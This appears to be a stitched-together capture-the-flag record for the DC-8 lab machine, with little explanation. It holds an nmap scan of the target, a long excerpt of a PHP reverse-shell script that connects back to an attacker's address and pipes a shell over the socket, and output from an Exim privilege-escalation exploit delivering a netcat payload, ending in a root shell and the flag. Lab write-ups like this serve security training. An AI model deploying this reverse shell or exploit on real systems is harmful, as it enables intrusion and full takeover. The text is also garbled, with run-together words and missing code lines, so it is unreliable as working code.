Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-18 20:10 CST Nmap scan report for10.10.10.138 Host is up (0.00027s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0) | ssh-hostkey: | 204835a7e6c4a83c631de1c0caa366bc88bf (RSA) | 256 abef9f69acea54c68c6155490ae7aad9 (ECDSA) |_ 2567ab2c687ec9376d4ea594b1bc6e873f2 (ED25519) 80/tcp open http Apache httpd |_http-title: Welcome to DC-8 | DC-8 |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache MAC Address: 08:00:27:ED:85:46 (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.43 seconds
// // Daemonise ourself if possible to avoid zombies later //
// pcntl_fork is hardly ever available, but will allow us to daemonise // our php process and avoid zombies. Worth a try... if (function_exists('pcntl_fork')) { // Fork and have the parent process exit $pid = pcntl_fork();
if ($pid == -1) { printit("ERROR: Can't fork"); exit(1); }
if ($pid) { exit(0); // Parent exits }
// Make the current process a session leader // Will only succeed if we forked if (posix_setsid() == -1) { printit("Error: Can't setsid()"); exit(1); }
$daemon = 1; } else { printit("WARNING: Failed to daemonise. This is quite common and not fatal."); }
// Change to a safe directory chdir("/");
// Remove any umask we inherited umask(0);
// // Do the reverse shell... //
// Open reverse connection $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit("$errstr ($errno)"); exit(1); }
// Spawn shell process $descriptorspec = array( 0 => array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to );
if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); }
// Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) { // Check for end of TCP connection if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; }
// Check for end of STDOUT if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; }
// Wait until a command is end down $sock, or some // command output is available on STDOUT or STDERR $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
// If we can read from the TCP socket, send // data to process's STDIN if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); }
// If we can read from the process's STDOUT // send data down tcp connection if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); }
// If we can read from the process's STDERR // send data down tcp connection if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } }
// Like print, but does nothing if we've daemonised ourself // (I can't figure out how to redirect STDOUT like a proper daemon) functionprintit ($string) { if (!$daemon) { print"$string\n"; } }
raptor_exim_wiz - "The Return of the WIZard" LPE exploit Copyright (c) 2019 Marco Ivaldi <raptor@0xdeadbeef.info>
Delivering netcat payload... 220 dc-8 ESMTP Exim 4.89 Thu, 18 May 202323:22:48 +1000 250 dc-8 Hello localhost [::1] 250 OK 250 Accepted 354 Enter message, ending with "." on a line by itself 250 OK id=1pzdai-0004rL-Bo 221 dc-8 closing connection
Waiting 5 seconds... localhost [127.0.0.1] 31337 (?) open id uid=0(root) gid=113(Debian-exim) groups=113(Debian-exim) python -c 'import pty;pty.spawn("/bin/bash")' root@dc-8:/var/spool/exim4# cd /root root@dc-8:/root# ls flag.txt root@dc-8:/root# cat flag.txt
Brilliant - you have succeeded!!!
8888888888888888888b. 888888888888 888 o 888888888888"Y88b 888 888 888 888 888 d8b 888 888 888 888 888 888 888 888 888 888 d888b 888 .d88b. 888 888 888 888 .d88b. 88888b. .d88b. 888 888 888 888 888d88888b888 d8P Y8b 888 888 888 888 d88""88b 888 "88b d8P Y8b 888888888888 88888P Y88888 8888888888888888888888888888888888888888 Y8P Y8P Y8P Y8P 8888P Y8888 Y8b. 888888888 .d88P Y88..88P 888888 Y8b. " "" " 888P Y888 "Y8888 888 888 8888888P""Y88P"888888"Y8888 888 888 888 888 Hope you enjoyed DC-8. Just wanted to send a big thanks out there to all those who have provided feedback, and all those who have taken the time to complete these little challenges. I'm also sending out an especially big thanks to: @4nqr34z @D4mianWayne @0xmzfr @theart42 This challenge was largely based on two things: 1. A Tweet that I came across from someone asking about 2FA on a Linux box, and whether it was worthwhile. 2. A suggestion from @theart42 The answer to that question is... If you enjoyed this CTF, send me a tweet via @DCAU7.